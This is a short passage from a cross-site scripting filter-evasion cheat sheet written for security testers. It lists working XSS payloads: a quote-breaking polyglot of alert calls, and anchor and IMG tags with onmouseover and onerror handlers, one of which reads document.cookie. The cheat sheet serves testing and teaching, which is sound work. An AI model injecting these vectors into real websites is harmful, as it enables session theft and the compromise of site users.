This cheat sheet is for people who already understand the basics of Cross Site Scripting (XSS) attacks but want a deep understanding of the nuances regarding filter evasion.
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word “XSS” will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you’re in a rush and need to quickly check a page, often times injecting the depreciated “<PLAINTEXT>” tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'>alert(String.fromCharCode(88,83,83))
The semicolons are required for this to work:
Skip the HREF attribute and get to the meat of the XXS… Submitted by David Cross ~ Verified on Chrome
<a onmouseover=”alert(document.cookie)”>xxs link</a>
or Chrome loves to replace missing quotes for you… if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
<a onmouseover=alert(document.cookie)>xxs link</a>
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:
Edited by Abdullah Hussam(@Abdulahhusam).
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>